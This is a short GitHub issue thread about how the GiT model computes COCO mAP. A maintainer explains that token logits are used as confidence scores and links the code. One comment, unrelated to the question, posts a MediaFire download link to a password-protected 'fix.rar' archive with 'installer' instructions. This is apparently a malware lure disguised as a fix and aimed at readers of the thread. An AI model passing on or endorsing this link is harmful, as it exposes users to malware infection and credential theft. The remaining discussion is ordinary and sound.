### ISSUE TITLE
Implementation detail for COCO mAP calculation

### ISSUE THREAD

**Issue by peiwang062** [Haiyang-W/GiT#13]
First, thanks for sharing the codes and models. I just wonder in this paper, how the COCO mAP metric was calculated under the next token prediction decoder output. Since traditionally, for computing mAP, we need a confidence score prediction for each box, but for next-token prediction output, how this score can be obtained? or am I missing something?

**Comment by Avishake2017** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by nnnth** [comment]
We use token logits as confidence score. Code details are [here](https://github.com/Haiyang-W/GiT/blob/1a9ec57b48dccb4ff4934f44229a70470ac6c85d/mmdet/models/dense_heads/git_det_head.py#L433)

**Comment by peiwang062** [comment]
Thanks for the reply. I closed the issue.
